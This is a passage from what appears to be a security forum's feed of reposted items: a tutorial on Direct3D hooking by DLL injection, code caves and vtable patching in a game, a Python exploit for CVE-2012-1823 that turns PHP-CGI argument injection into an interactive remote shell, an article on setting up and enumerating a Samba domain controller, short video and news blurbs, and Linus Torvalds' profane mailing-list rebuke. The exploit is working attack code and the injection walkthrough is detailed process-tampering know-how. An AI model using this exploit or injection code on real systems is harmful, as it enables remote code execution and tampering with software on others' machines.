hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { char path[MAX_PATH]; char exename[MAX_PATH]; char dllname[MAX_PATH]; // aquire full path to exe: GetModuleFileNameA(0, path, MAX_PATH); // find the position of the last backslash and delete whatever follows // (eg C:\Games\loader.exe becomes C:\Games\) int pos = 0; for (int k = 0; k < strlen(path); k++) { if (path[k] == '\\') { pos = k; } } path[pos+1] = 0; // null-terminate it for strcat // build path to target strcpy_s(exename, path); strcat_s(exename, EXE_NAME); // build path to dll strcpy_s(dllname, path); strcat_s(dllname, DLL_NAME); // launch program: STARTUPINFOA siStartupInfo; PROCESS_INFORMATION piProcessInfo; memset(&siStartupInfo, 0, sizeof(siStartupInfo)); memset(&piProcessInfo, 0, sizeof(piProcessInfo)); siStartupInfo.cb = sizeof(siStartupInfo); if (!CreateProcessA(NULL, exename, 0, 0, false, CREATE_SUSPENDED, 0, 0, &siStartupInfo, &piProcessInfo)) { MessageBoxA(NULL, exename, "Error", MB_OK); } // get the process id for injection DWORD pId = piProcessInfo.dwProcessId; // Inject the dll if (!InjectDLL(pId, dllname)) { MessageBoxA(NULL, "Injection failed", "Error", MB_OK); } ResumeThread(piProcessInfo.hThread); return 0; } Now that we have a loader we need something to actually inject. Add a new win32 dll project and call it dll. First off add another main.cpp to this project. CODE C Language #include <windows.h> #include <detours.h> #pragma comment(lib, "detours.lib") BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { DisableThreadLibraryCalls(hModule); // Apply the hook } } return TRUE; } Hmm ok we know that the game uses LoadLibraryA to access directX. This means that we cannot directly hook Direct3DCreate8 because a) It isnt loaded yet We wouldnt know the address of it What we're going to do is firstly hook the LoadLibraryA function. typedef HMODULE (WINAPI *LoadLibrary_t)(LPCSTR); LoadLibrary_t orig_LoadLibrary; // holds address of original non-detoured function // Our hooked LoadLibrary HMODULE WINAPI LoadLibrary_Hook ( LPCSTR lpFileName ) { HMODULE hM = orig_LoadLibrary( lpFileName ); // keep functionality return hM; } // When the dll loads orig_LoadLibrary = (LoadLibrary_t)DetourFunction((LPBYTE) LoadLibraryA, (LPBYTE) LoadLibrary_Hook ); Ok well for starters you can build the solution, place the 2 output files in your game directory and see if it actually works so far. If it doesnt crash, sweet, we're ready to continue We'll use our hooked function to see when d3d8.dll is actually being loaded. When it does, we can get the address of Direct3DCreate8 and detour that too. During testing I saw that the game loads the dll a few times before carrying on so if you're working on another game that doesn't you can take the counter check out. // Our hooked LoadLibrary HMODULE WINAPI LoadLibrary_Hook ( LPCSTR lpFileName ) { static int hooked = 0; HMODULE hM = orig_LoadLibrary( lpFileName ); if ( strcmp( lpFileName, "d3d8.dll" ) == 0) { hooked++; if (hooked == 3) { // get address of function to hook pDirect3DCreate8 = (PBYTE)GetProcAddress(hM, "Direct3DCreate8"); HookAPI(); } } return hM; } To hook Direct3DCreate8 we will need a few more variables. // globals // Our hook function IDirect3D8* __stdcall hook_Direct3DCreate8(UINT sdkVers); // The original to call typedef IDirect3D8* (__stdcall *Direct3DCreate8_t)(UINT SDKVersion); Direct3DCreate8_t orig_Direct3DCreate8; // Holds address that we get in our LoadLibrary hook (used for detour) PBYTE pDirect3DCreate8; The HookAPI() function looks as follows: void HookAPI() { // simple detour orig_Direct3DCreate8 = (Direct3DCreate8_t)DetourFunction(pDirect3DCreate8, (PBYTE)hook_Direct3DCreate8); } Now we have access to the created IDirect3D object IDirect3D8* __stdcall hook_Direct3DCreate8(UINT sdkVers) { IDirect3D8* pD3d8 = orig_Direct3DCreate8(sdkVers); // real one // Use a vtable hook on CreateDevice to get the device pointer later DWORD* pVtable = GetVtableAddress(pD3d8); HookFunction(pVtable, (void*)&hook_CreateDevice, (void*)&orig_CreateDevice, 15); return pD3d8; } Okay now you might be wondering wtf is going on . Let me explain. An object that has virtual methods is laid out in memory like so (roughly) --Object-- pointer to vtable (4 bytes) member 1 member 2 ... ---------- --VTable-- pointer to method 1 (4 bytes) pointer 2 method 2 (4 bytes) ... ---------- This means that if we have a pointer to an object (all that work up there , we have access to its vtable (which has addresses of all its functions). We can get this pointer with the following code: DWORD* GetVtableAddress(void* pObject) { // The first 4 bytes of the object is a pointer to the vtable: return (DWORD*)*((DWORD*)pObject); } If we have access to the vtable, it should be pretty easy to replace the pointer of any of its virtual functions to point to a hooked function that we define . There is one issue. If you have a C++ class class Foo { virtual void Method1(int a); }; , Method1 has parameters void Method1(Foo* pThis, int a); This is where the this pointer comes from. The compiler inserts that for you. This means that if we want to hook any of IDirect3D8's methods using the vtable we define them with an extra pointer mmkay. In order to hook a function you will need its offset from the base address of the vtable. You can find these offsets online or simply count in the d3d8.h file from the sdk. The vtable is write-protected so we need a few calls to VirtualProtect to overwrite anything. A little function to hook a vtable address: void HookFunction(DWORD* pVtable, void* pHookProc, void* pOldProc, int iIndex) { // Enable writing to the vtable at address we aquired DWORD lpflOldProtect; VirtualProtect((void*)&pVtable[iIndex], sizeof(DWORD), PAGE_READWRITE, &lpflOldProtect); // Store old address if (pOldProc) { *(DWORD*)pOldProc = pVtable[iIndex]; } // Overwrite original address pVtable[iIndex] = (DWORD)pHookProc; // Restore protection VirtualProtect(pVtable, sizeof(DWORD), lpflOldProtect, &lpflOldProtect); } All the pointer dereferencing is way confusing O_O. if you cant follow it just read over it a few times till it makes sense. Anyways, back to what we were trying to do.. We wanted to hook CreateDevice sooo.... lets start with a few more globals // CreateDevice typedef HRESULT (APIENTRY *CreateDevice_t)(IDirect3D8*,UINT,D3DDEVTYPE,HWND,DWORD,D3DPRESENT_PARAMETERS*,IDirect3DDevic e8**); CreateDevice_t orig_CreateDevice; HRESULT APIENTRY hook_CreateDevice(IDirect3D8* pInterface, UINT Adapter,D3DDEVTYPE DeviceType,HWND hFocusWindow,DWORD BehaviorFlags,D3DPRESENT_PARAMETERS* pPresentationParameters,IDirect3DDevice8** ppReturnedDeviceInterface); And the hook proc (note the extra pointer): HRESULT APIENTRY hook_CreateDevice(IDirect3D8* pInterface, UINT Adapter,D3DDEVTYPE DeviceType,HWND hFocusWindow,DWORD BehaviorFlags,D3DPRESENT_PARAMETERS* pPresentationParameters,IDirect3DDevice8** ppReturnedDeviceInterface) { HRESULT ret = orig_CreateDevice(pInterface, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface); // Registers MUST be preserved when doing your own stuff!! __asm pushad // get a pointer to the created device IDirect3DDevice8* d3ddev = *ppReturnedDeviceInterface; // lets log it (format in hex mode to make it easier to work with) char buf[50] = {0}; sprintf_s(buf, sizeof(buf), "pD3ddev: %X", d3ddev); std::ofstream of; of.open("C:\\d3d_log.txt", std::ios::app); // append mode of << buf; of.close(); __asm popad return ret; } PHEW. Done with this part . Now you might be wondering WTF all that trouble was for. Well. We'll get to that ------------------- PART 2 : Making the runtime hook --------------------------------- Lets start with a bit more theory With what we have just done we can hook any of IDirect3DDevice8's methods eg EndScene or DrawIndexedPrimitive in a similar way to hooking CreateDevice. But then we would have to start the game with our loader every time . We need a way of getting the device pointer without any of the hooks we used. This is where I decided to do a bit of code injection Lets get going. Start the game using your loader. Dont exit it, we gonna start debugging. If you can, switch the game to windowed mode (breakpoints dnt f*** up like with fullscreen d3d apps). But we busy with warcraft here remember and it doesnt have that option. O well Alt-tab and check your C: drive. If the hook worked you should have a nice little d3d_log.txt waiting for you . Open it up and copy the address of your d3d device. Mine is 6E7100. Run OllyDbg and attach to war3.exe. Hit alt+e to see a list of executable modules. Look for d3d8.dll. Right click on it and say copy->base. Store this somewhere for later. Detach olly from the process (as in DETACH it, make sure the game does not exit! We are still working). Fire up CheatEngine and manually add the address of your device (eg mine being 6E7100). Right click on it and select Find Out What Accessses this address. Alt-tab in and out of the game. You should have a nice long list of instructions that access your device pointer. We want to find one located in the d3d8.dll module because any other directx8 game will load this as well. Remember that base address you took down? You gonna need it now. Mine was 68B90000. Look for an instruction in the list that looks like it was called from this module. Here is a picture as an example. For sake of the tutorial Il use the one that ive already used in the final dll. On this run it is located at 68BFCBF7. The thing is, this address cannot be hardcoded because it will change whenever d3d8.dll is loaded at a different base address. We can find it every time, though. We just need its OFFSET from the base of the module. Base + Offset = Address. What we do is subtract the base from our address to get the offset. 68BFCBF7 - 68B90000 = 6CBF7 This offset will always stay the same. Weo. What we are going to do now is use this instruction to get the pointer every time. Lets hit a bit more olly. Attach to war3.exe again (make sure you close cheat engine first else olly will puke on you). Hit ctrl+g and paste in the address of your instruction. Hit enter. if all went well you should be here: What we want to do is set up a code cave and steal the address. We need an empty space in the code where we can do our own thing. If you hit ctrl+end you should be at the bottom of the d3d8 module. There are a lot of zeroes here which is perfect for us. Hit ctrl+g and move back to where we were. What we want to do is set up a JMP instruction into empty space and set up our cave. For purpose of the tutorial im going to be jumping to BASE + F3FC5. Hit space on your instruction to assemble the jmp. In this case I have a Hit enter on it to jump to our cave. We have to restore the instructions we overwrote by assembling the jump though. So hit space and fill in the first one. Then the second. The address of our device is currently in EAX so lets put that somewhere where we can find it . 4 bytes above the cave sounds good to me. So we MOV the pointer to an address that we know and JMP back to the next real instruction. Dont run this now, you will get an access violation when trying to write to that address. We will virtualProtect it later. If you press ctrl+a to analyse the code and it doesnt come out scrambled it should all be fine. Hit enter on the jmps to see if they go to the right place. We have ourselves a nice working code cave. If we want to inject this we will need the assembled bytecodes. Start with the jump. select it and press ctrl+insert to binary copy. Save this somewhere. Do the same for the entire cave (make sure to select it all). Phew. Time to code this baby. Create a new win32 dll project and call it d3d. Add another main.cpp When we attach we want to run the code injector and address grabber in a new thread, else the game will hang and never execute the code we want :/ So we have #include <windows.h> BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hModule); CreateThread(0, 0, Patch_StealD3d8Device, 0, 0, 0); } return TRUE; } The code injector routine looks as follows: DWORD WINAPI Patch_StealD3d8Device(LPVOID param) { // Aquire base address of d3d8.dll int base_d3d8 = (int)GetModuleBaseAddress(GetCurrentProcessId(), "d3d8.dll"); // add offsets to get addresses const int addr_jmp = base_d3d8 + 0x00076E33; const int addr_cave = base_d3d8 + 0x000F3FC9; const int addr_value = base_d3d8 + 0x000F3FC5; // The bytecode we got byte jmp[] = "\xE9\x91\xD1\x07"; // last ACTUAL byte is \x00 which works out with a null-terminated string byte cave[] = "\x8B\x06\x8B\x48\x08\x89\x35\xC5\x3F\x0B\x6D\xE9\x5F\x2E\xF8\xFF"; // This null-terminated // buddy is ok because its floating in a sea of zeroes // virtualprotect the addresses for writing DWORD lpflOldProtect; // write jmps VirtualProtect((void*)addr_jmp, sizeof(jmp), PAGE_EXECUTE_READWRITE, &lpflOldProtect); memcpy((void*)addr_jmp, (void*)jmp, sizeof(jmp)); VirtualProtect((void*)addr_jmp, sizeof(jmp), lpflOldProtect, &lpflOldProtect); // write caves VirtualProtect((void*)addr_cave, sizeof(cave), PAGE_EXECUTE_READWRITE, &lpflOldProtect); memcpy((void*)addr_cave, (void*)cave, sizeof(cave)); // modify code to make sure that we store in the right place *(int*)(addr_cave + 7) = addr_value; VirtualProtect((void*)addr_cave, sizeof(cave), lpflOldProtect, &lpflOldProtect); // protect value addr for writing VirtualProtect((void*)addr_value, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &lpflOldProtect); // Wait for the value of the vtable and hook stuff HANDLE hThread = CreateThread(0, 0, HookAPI, 0, 0, 0); WaitForSingleObject(hThread, INFINITE); // restore jmp byte orig[] = {0x8B, 0x06, 0x8B, 0x48, 0x08}; VirtualProtect((void*)addr_jmp, sizeof(orig), PAGE_EXECUTE_READWRITE, &lpflOldProtect); memcpy((void*)addr_jmp, (void*)orig, sizeof(orig)); VirtualProtect((void*)addr_jmp, sizeof(orig), lpflOldProtect, &lpflOldProtect); return 1; } The reason for the *(int*)(addr_cave + 7) = addr_value; is that we cannot have any hardcoded addresses. We write the real address to the right place in the code. We are almost ready to hook . We create a new thread that reads in the address of the device pointer. using that we can use a vtable hook on whichever methods we want // globals DWORD* pVtable; DWORD WINAPI HookAPI(LPVOID param) { // Aquire base address of d3d8.dll int base_d3d8 = (int)GetModuleBaseAddress(GetCurrentProcessId(), "d3d8.dll"); const int addr_value = base_d3d8 + 0x000F3FC5; Sleep(100); // wait for address to get written // protect value addr for reading / writing DWORD lpflOldProtect; VirtualProtect((void*)addr_value, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &lpflOldProtect); // poll the value until it gets written by our cave DWORD result = 0; while (!result) { result = *(DWORD*)addr_value; Sleep(10); } // find the vtable pVtable = GetVtableAddress((void*)result); // APPLY THE HOOK, FINALLY!!! HookFunction(pVtable, (void*)&hook_EndScene, (void*)&orig_EndScene, 35); HookFunction(pVtable, (void*)&hook_DrawIndexedPrimitive, (void*)&orig_DrawIndexedPrimitive, 71); HookFunction(pVtable, (void*)&hook_Present, (void*)&orig_Present, 15); HookFunction(pVtable, (void*)&hook_SetStreamSource, (void*)&orig_SetStreamSource, 83); return 1; } I almost forgot. The code to get the base address of a loaded module was written by Sheep afaik and is as follows: // Project must not be unicode else this will not compile DWORD* GetModuleBaseAddress(DWORD iProcId, char* DLLName) { HANDLE hSnap; // Process snapshot handle. MODULEENTRY32 xModule; // Module information structure. hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, iProcId); // Creates a module // snapshot of the // game process. xModule.dwSize = sizeof(MODULEENTRY32); // Needed for Module32First/Next to work. if (Module32First(hSnap, &xModule)) // Gets the first module. { do { if (strcmp(xModule.szModule, DLLName) == 0) // If this is the module we want... { CloseHandle(hSnap); // Free the handle. return (DWORD*)xModule.modBaseAddr; // return the base address. } } while (Module32Next(hSnap, &xModule)); // Loops through the rest of the modules. } CloseHandle(hSnap); // Free the handle. return 0; // If the result of the function is 0, it didn't find the base address. // i.e.. the dll isn't loaded. } Hooking the functions now is as straightforward as it was to hook CreateDevice earlier. Just as an example to get you going the hook code for EndScene would look like this: // hooks.h #include <d3d8.h> #include <d3dx8.h> //EndScene (offset : 35) typedef HRESULT (APIENTRY *EndScene_t)(IDirect3DDevice8*); HRESULT APIENTRY hook_EndScene(IDirect3DDevice8* pInterface); extern EndScene_t orig_EndScene; // hooks.cpp //Endscene EndScene_t orig_EndScene; HRESULT APIENTRY hook_EndScene(IDirect3DDevice8* pInterface) { __asm pushad // just a check D3DRECT rec = {0, 0, 20, 20}; pInterface->Clear(1, &rec, D3DCLEAR_TARGET, D3DCOLOR_XRGB(255, 0, 0), 0, 0); __asm popad return orig_EndScene(pInterface); } And viola, we have a working runtime hook I used text instead of the Clear but whatever Conclusion There is a slight issue with this code and that is the code injection. I dont know if those offsets will work with other installs of directx. I doubt it though :/ lol. One could probably redistribute the correct d3d8.dll with the hook or something . Il attach it and the final release build if any1 wants to test it on a dx8 game . Ive run it on warcraft and ut2004 (which used dx8??) and it worked both times . Writing this has really taken a while and raped my fingers but im glad I can finally share something. Ive learnt a lot doing this and I hope reading it has taught you something new as well Thanks to everyone who has helped me on this and who's code I have used or tutorials i have followed illuz1oN Bobbysing (Gamedeception) xXx (http://paste.lisp.or...splay/58743/raw) Uranium-239 Darawk Sheep COPYRIGHT: Please do not copy this without written permission from me, only link to it. Sursa: Run-time directx hooking using code injection and vtable - rohitab.com - Forums

PHP-CGI Argument Injection Remote Code Execution #!/usr/bin/python import requests import sys print """ CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution This exploit abuses an arguement injection in the PHP-CGI wrapper to execute code as the PHP user/webserver user. Feel free to give me abuse about this <3 - infodox | insecurety.net | @info_dox """ if len(sys.argv) != 2: print "Usage: ./cve-2012-1823.py <target>" sys.exit(0) target = sys.argv[1] url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input""" lol = """<?php system('""" lol2 = """');die(); ?>""" print "[+] Connecting and spawning a shell..." while True: try: bobcat = raw_input("%s:~$ " %(target)) lulz = lol + bobcat + lol2 hax = requests.post(url, lulz) print hax.text except KeyboardInterrupt: print "\n[-] Quitting" sys.exit(1) Sursa: PHP-CGI Argument Injection Remote Code Execution - CXSecurity WLB

Defend Your Freedoms Online: It's Political, Stupid! Description: DEFEND YOUR FREEDOMS ONLINE: IT'S POLITICAL, STUPID! A Positive agenda against the next ACTA, SOPA, and such Over the years we learned impressively how to oppose bad legislation hurting our freedoms online. We are now facing an even bigger challenge: how to guarantee that a Free, open, decentralized Internet will be protected in the long run? In 2012 The Internetz won major battles against SOPA/PIPA in the US, and against ACTA in the EU. Yet, we know that the powerful industries and governments behind these projects will never stop. They have an incentive to gain control of the Internet, attacking fundamental rights and promoting technologies like "Deep Packet Inspection", now being deployed in each and every corner of the Net, and used indifferently to break Net neutrality, to filter, block and censor communications or to inspect citizens traffic. How to push for proposals that will ensure that the sharing of knowledge and culture, citizens freedoms, and access to an open infrastructure will be guaranteed in the future public policies? How to become as successful in proposition as we are now in opposition? (Hint: it's political, stupid!) On Wednesday, July 4th 2012, The European Parliament rejected ACTA, the evil, dangerous and illegitimate copyright treaty, by a huge majority of 478 to 39. To all those who, for years, said it was impossible: we did it. Resonating in echo to victory against SOPA/PIPA in the US, this is a major victory for the multitude of connected citizens and organizations who worked hard for years, but also a great hope on a global scale for a better democracy. These victories are of huge symbolic and political value, and we're still beginning to comprehend fully its meaning. It is now our duty to shape its political consequences. All is in our hands. For years we have been witnessing the converging interests of political and industrial powers to attempt to get control of a Free Internet through various repressive measures (censorship, copyright enforcement, attacks against Net neutrality, etc.). We know that their attempts at attaining their financial or political objectives will never stop. And we must continue to combat them. Still, we learned over the years, by demonstrating what we advocate for, that we are capable of formulating clear alternative to each and every bad piece of legislation being proposed. From that effort is born a positive political agenda, aggregating all the proposals that were put forward by La Quadrature du Net and other activists while doing the opposition job. It is a political battle, in the ethymological sense of the word "politics": citizens caring about the affairs of the city, in that case: the Internets. All is on the table for each and every citizen to take part in a great effort for fostering the sharing of culture and knowledge, protecting Human Rights in the digital society and guaranteeing access to a Free and open Internet. Let's get things moving forward! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Defend Your Freedoms Online: It's Political, Stupid!

Scanning Web Site With Vega Scanner On Backtrack 5 R2 Description: Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Scanning Web Site With Vega Scanner On Backtrack 5 R2

Pen Testing Domain Controllers Dejan Lukan January 02, 2013 Introduction When performing a penetration test, we’re constantly stumbling upon various servers that support domain logins into the customers network. We’re allowed to login if we know the username and password of an arbitrary account as well as the domain name. In this article we’ll take a closer look how a domain login is actually implemented and what is happening behind the curtains when we’re trying to authenticate to the domain. First, we must clarify some concepts to make the reader better understand the topic if he or she is not already familiar with it. First we must define a domain. A domain is basically a set of resources, like users, passwords, printers, etc that are managed by a domain controller. But why would we want to have a domain controller and a domain login to the system? It’s because we want to store users, groups and their permissions on the same server. The key benefit of this is the fact that any user that is in the system can login to the arbitrary machine in the network with the same username and password. In a Windows environment, all the information is stored in an Active Directory (AD). An AD domain controller authenticates and authorizes all users and computers in a Windows domain type network—assigning and enforcing security policies for all computers and installing or updating software. For example, when a user logs into a computer that is part of a Windows domain, Active Directory checks the submitted password and determines whether the user is a system administrator or normal user. Active Directory uses Lightweight Directory Access Protocol (LDAP), Kerberos and DNS [1]. A domain controller (DC) or network domain controller is a Windows-based computer system that is used for storing useraccount data in a central database. A domain controller in a computer network is the centrepiece of the Active Directory services that provides domain-wide services to the users, such as security policy enforcement, user authentication, and access to resources [2]. Domain controllers can greatly simplify the administration, since we can use it to grant ordeny access to resources in the network, such as printers, documents, and shared folders, with one single user account. By using the domain controller, a user can also get access to his personal resources like files on a Desktop from anywhere in the network; all he has to do is login with his existing user account. The limitation of a domain controller that uses Active Directory is that only the computers running the Windows operating system are capable of using it. This means that if the AD is in place, the computers running operating systems like Linux, HP-UX, and Solaris won’t be able to use the AD to authenticate. There is a solution, however. Instead of using the domain controller that uses Active Directory, we can now use Samba, which is open-source and not limited to Windows operating systems. Because of the limitation in the domain controllers that uses Active Directory, we’ll exclusively focus on the Samba domain controller in the sections that follow. Turnkey: Samba Windows PDC We can download an ISO image or an already functional vmdk virtual image from the Turnkey Linux Samba Domain Controller website. On the mentioned website, we can download a Samba-based Linux distribution that acts as domain controller. It supports netlogon, network attached storage for domain users, roaming profiles and PnP printing services and a web interface for configuring Samba and printing services [3]. I downloaded the provided vmdk virtual image, set-up it in Virtualbox and ran it. Upon booting, Linux will ask you for a root password as well as the AjaXplorer password. The AjaXplorer is just a web interface, which lets you access the files on your server directly from the web browser. We’re not here to discuss that—we want to know more about the Samba domain controller. Next, the system will ask us for a domain name, which we must fill out. We can see that on the picture below: We’ve entered the domain name mydomain into the input box, which will set the domain we would like to be using. After that we also need to provide a new password for the samba administrator user: Once we’re finished with the configuration of the PDC, we need to reboot it, which will start a fresh domain controller on our network. After that, we can SSH to the domain controller with the root username and the password we’ve set during the configuration process. Once logged-in, we can display a list of open ports that we can connect to. We can do that with the netstat command like this: # netstat -luntp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 960/lighttpd tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 980/sshd tcp 0 0 0.0.0.0:631 0.0.0.0:* LISTEN 929/cupsd tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 960/lighttpd tcp 0 0 0.0.0.0:12320 0.0.0.0:* LISTEN 869/shellinaboxd tcp 0 0 0.0.0.0:12321 0.0.0.0:* LISTEN 1027/perl tcp6 0 0 :::139 :: LISTEN 986/smbd tcp6 0 0 :::22 :: LISTEN 980/sshd tcp6 0 0 :::445 :: LISTEN 98 We’re connected through the SSH server, so we already know that port 22 is open. Additionally, the following ports are also open: 80 and 443 for web server, 631 for cups printing system, 12320 for shellinthebox server, 139 and 445 for windows shared folders and 12321 for Webmin. If we connect to the web server on either port 80 or 443, we’ll see the TurnKey domain controller web interface as we can see below: Depending on which icon we click, we’ll be redirected to the appropriate server running on the already mentioned open ports. Currently we’re interested in Samba, since we want to set-up a domain controller. When we click on the Samba icon on the picture above, we’ll be redirected to the Webmin web interface accessible on the port 12321 as we can see below: We need to login with the root username and password which was set during the configuration of the Turnkey Linux. Once we’re successfully authenticated, we’ll see a number of different settings that we can configure. We can see them on the picture below: To join a domain, we need to go to our Windows client operating system and right-click on the My Computer icon and selecting Properties. After that we need to press on the “Change” button in the “Computer Name” category, which will gives us the option to change the computer name as well as join the domain. That can be seen on the picture below: Once we click on the Change button, a new window will pop-up where we can actually change the computer name and join a domain. We can see that on the picture below where we specified domaintest as the new computer name and our previously configured domain mydomain. Once we have filled in the name of our computer and provided the domain in which we want to authenticate, we can press the OK button to save the settings. Another pop-up window will appear asking us for the username and password of the user configured in the domain. At this time, only the administrator user is configured, which has the password we’ve set-up in the configuration phase. Once we’ve provided the right username and password, the system will have to reboot. When we press the OK button, the system will restart and the changes will take effect. After the restart we’ll have the option to choose our specified domain to authenticate the user to as can be seen on the picture below: We again need to supply the right username administrator and the password to login to the system. Because we’re logging-in for the first time, the Windows operating system will initialize a new computer user by configuring the most basic settings like Internet Explorer and Desktop. A part of the configuration process can be seen on the picture below: Once the initialization is done, we’ll be logged into the system with our domain username and password. After that, we can open the command prompt and check whether we’re actually part of the domain. We can do that with the “net localgroup /domain” command, whose result can be seen on the picture below: We can see that an active domain controller was returned and is accessible with the PDC domain name. If we ping PDC, we’ll get appropriate IP resolution for the domain controller. We can get the same information by displaying the value of the LOGONSERVER variable like presented on the picture below: The result is the PDC domain, which resolves to the 10.1.1.124, but we can do this after we’re already logged in. Is there any way to figure out the address of domain controller when we’re not authenticated? We can also list all users in a domain with the use of the “net users /domain” command, which result is presented on the picture below: We can also port scan the domain controller to find out the open ports (remember that we already know that since we have access to the domain controller, but a hacker doesn’t). The output of the nmap port scanning tool can be seen below: # nmap 10.1.1.124 Starting Nmap 5.51 ( http://nmap.org ) Nmap scan report for 10.1.1.124 Host is up (0.0023s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 631/tcp open ipp The NetBIOS Enumerator (nbtenum) program is then able to scan the network for interesting web services like SMB. When we start the nbtenum.exe program, we’ll be presented with the following window: We can see that we specified the nbtenum to scan the entire IP range from 10.1.1.1-255. It detected that the IP Address 10.1.1.106 (our Windows box joined to the domain controller) and the IP Address 10.1.1.124 (our domain controller) have information available. We can see that each IP address has a corresponding domain name. The IP address 10.1.1.106 has a domain name computer_1, while the domain controller 10.1.1.124 has a domain name pdc. We can also see that the domain controller has other services enabled. Conclusion We’ve seen that we can easily set-up a domain controller by using an already provided Turnkey Linux distribution to which we can authenticate from the Windows machines. We also got the default shared folder on the Linux Turnkey distribution for every user that authenticates to the domain controller. By using the domain controller, we can keep the user credentials in one place and provide our users with a default network drive where they can save their files that can be accessed from any other machine in the network (the hypothesis being that the user has previously authenticated against the domain controller successfully). Finally, we’ve also seen how we can discover the domain controller and perform basic scanning functions on the local network for SMB shares. References: [1]: Active Directory, accessible on Active Directory - Wikipedia, the free encyclopedia. [2]: What Is a Domain Controller & What Does it Do, accessible on Answering: What Is a Domain Controller & What Does it Do?. [3]: Domain Controller – Drop-in PDC replacement, accessible on http://www.turnkeylinux.org/domain-controller. Sursa: InfoSec Institute Resources – Pen Testing Domain Controllers

Da, acum l-am vazut si eu. Mi-au placut in special doua legaturi: 1. asemanarea cu persoanele care merg la razboi 2. asemanarea cu traficantii de droguri Si da, slide-ul asta trebuie citit: https://www.youtube.com/watch?feature=player_embedded&v=2KOnvI00NeQ#t=2393s Merita vazut, si daca nu aveti rabdare, puteti incepe de la minutul 18 pana pe la minutul 40.

[h=1]Ubuntu for Smartphones Announced – VIDEO[/h]January 2nd, 2013, 18:22 GMT · By Silviu Stahie Canonical is becoming one of the biggest players in today’s market and goes head to head with Apple and Google by launching Ubuntu for smartphones. We can’t really say it’s much of a surprise, but still, Ubuntu going to smartphones is one of the few directions left for Canonical. According to Canonical, Ubuntu uniquely gives handset OEMs and mobile operators the ability to converge phone, PC and thin client into a single enterprise superphone. "We expect Ubuntu to be popular in the enterprise market, enabling customers to provision a single secure device for all PC, thin client and phone functions. Ubuntu is already the most widely used Linux enterprise desktop, with customers in a wide range of sectors focused on security, cost and manageability" said Jane Silber, CEO of Canonical. Canonical is also targeting basic smartphones that are used just for their simple functions such as email, SMS and Web. Ubuntu for smartphones has a few features that will set it apart from the direct competition, Google and its Android OS. The interface will allow thumb gestures from all four edges of the screen, enabling uses to find content and switch between apps faster than other phones, voice and text commands in any application, it has HTML5 support, and users can personalize the art on the welcome screen. Canonical also offers some incentives for the potential Ubuntu phone buyers, such as a cloud service, Ubuntu One, providing storage and media services. The company also thinks that by offering a single family of products, for PC, TV and phones, it will greatly benefit the customer. "We are defining a new era of convergence in technology, with one unified operating system that underpins cloud computing, data centers, PCs and consumer electronics" says Mark Shuttleworth, founder of Ubuntu and VP Products at Canonical. The new QML-based Ubuntu SDK also insures that an application developed for Ubuntu will run both on PC and the phone. Ubuntu phones are not yet available for purchase, but Canonical is ready to work with partners and expects to ship the first models by the end of 2013. Sursa: Ubuntu for Smartphones Announced – VIDEO - Softpedia

[TABLE] [TR] [TD=class: lp]From[/TD] [TD=class: rp]Linus Torvalds <>[/TD] [/TR] [TR] [TD=class: lp]Date[/TD] [TD=class: rp]Sun, 23 Dec 2012 09:36:15 -0800[/TD] [/TR] [TR] [TD=class: lp]Subject[/TD] [TD=class: rp]Re: [Regression w/ patch] Media commit causes user space to misbahave (was: Re: Linux 3.8-rc1)[/TD] [/TR] [/TABLE] On Sun, Dec 23, 2012 at 6:08 AM, Mauro Carvalho Chehab <mchehab@redhat.com> wrote: > > Are you saying that pulseaudio is entering on some weird loop if the > returned value is not -EINVAL? That seems a bug at pulseaudio. Mauro, SHUT THE FUCK UP! It's a bug alright - in the kernel. How long have you been a maintainer? And you *still* haven't learnt the first rule of kernel maintenance? If a change results in user programs breaking, it's a bug in the kernel. We never EVER blame the user programs. How hard can this be to understand? To make matters worse, commit f0ed2ce840b3 is clearly total and utter CRAP even if it didn't break applications. ENOENT is not a valid error return from an ioctl. Never has been, never will be. ENOENT means "No such file and directory", and is for path operations. ioctl's are done on files that have already been opened, there's no way in hell that ENOENT would ever be valid. > So, on a first glance, this doesn't sound like a regression, > but, instead, it looks tha pulseaudio/tumbleweed has some serious > bugs and/or regressions. Shut up, Mauro. And I don't _ever_ want to hear that kind of obvious garbage and idiocy from a kernel maintainer again. Seriously. I'd wait for Rafael's patch to go through you, but I have another error report in my mailbox of all KDE media applications being broken by v3.8-rc1, and I bet it's the same kernel bug. And you've shown yourself to not be competent in this issue, so I'll apply it directly and immediately myself. WE DO NOT BREAK USERSPACE! Seriously. How hard is this rule to understand? We particularly don't break user space with TOTAL CRAP. I'm angry, because your whole email was so _horribly_ wrong, and the patch that broke things was so obviously crap. The whole patch is incredibly broken shit. It adds an insane error code (ENOENT), and then because it's so insane, it adds a few places to fix it up ("ret == -ENOENT ? -EINVAL : ret"). The fact that you then try to make *excuses* for breaking user space, and blaming some external program that *used* to work, is just shameful. It's not how we work. Fix your f*cking 